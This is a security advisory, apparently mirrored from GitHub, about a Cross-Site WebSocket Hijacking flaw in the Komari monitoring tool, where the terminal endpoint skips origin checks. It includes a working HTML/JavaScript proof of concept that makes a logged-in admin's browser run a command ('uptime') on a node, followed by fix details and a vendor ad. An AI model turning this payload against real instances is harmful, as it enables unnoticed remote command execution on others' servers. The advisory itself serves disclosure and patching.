Komari vulnerable to Cross-site WebSocket Hijacking
Summary
WebSocket upgrader has disabled origin checking, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks against authenticated users
Details
https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35
Any third party website can send requests to the terminal websocket endpoint with browser's cookies, resulting in remote code execution
PoC
- Login in to your komari instance
- Hosting the following HTML code on internet, replace
<komari-addr>and<target-uuid>into yours - Visit this HTML page, you can see your node is executing
uptimewithout your actions
<pre></pre>
<script>
const socket = new WebSocket("wss://<komari-addr>/api/admin/client/<target-uuid>/terminal");
socket.addEventListener("open", (event) => {
const binaryBlob = new Blob(['uptime\n'], { type: 'application/octet-stream' });
socket.send(binaryBlob);
});
socket.addEventListener("message", (event) => {
event.data.text().then(x => {document.querySelector("pre").append(x)});
});
</script>
Impact
An administrator of a Komari instance will execute commands on their nodes unnoticed when visiting a malware page.
| Software | From | Fixed in |
|---|---|---|
github.com/komari-monitor/komari
|
- | 0.0.0-20250809073044-53171affcaf0 |
- https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35
- https://github.com/komari-monitor/komari/commit/53171affcaf050145810efaaef420651a6e630be
- https://github.com/komari-monitor/komari/releases/tag/1.0.4-fix2
- https://github.com/komari-monitor/komari/security/advisories/GHSA-q355-h244-969h
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime